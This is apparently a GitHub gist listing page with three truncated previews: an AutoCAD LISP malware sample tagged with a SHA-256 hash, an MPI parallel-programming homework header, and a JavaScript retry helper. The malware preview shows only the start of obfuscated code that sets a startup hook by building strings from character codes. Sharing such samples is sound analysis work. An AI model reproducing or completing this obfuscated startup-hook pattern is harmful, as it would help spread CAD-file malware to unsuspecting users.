👾
- https://ksaj.inlisp.org (coming soon)
- @IntruderVS1400
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Uploaded by @JohnLaTwC | |
## AutoCAD LISP Malware | |
################################################################### | |
## 332ca1146b1478cc9ddda9be07815a48071b9e83081eb995f33379385d3258f2 | |
(setq s::startup nil) | |
(setq *startup* (strcat (chr 40) | |
(chr 115) | |
(chr 101) | |
(chr 116) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/********************************************* | |
* Rearranged by Metin ÖZTÜRK | |
* Parallel Programming Homework III | |
**********************************************/ | |
#include <stdio.h> | |
#include <math.h> | |
#include <stdbool.h> | |
#include <stdlib.h> | |
#include "mpi.h" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function retry(isDone, next) { | |
var current_trial = 0, max_retry = 50, interval = 10, is_timeout = false; | |
var id = window.setInterval( | |
function() { | |
if (isDone()) { | |
window.clearInterval(id); | |
next(is_timeout); | |
} | |
if (current_trial++ > max_retry) { | |
window.clearInterval(id); |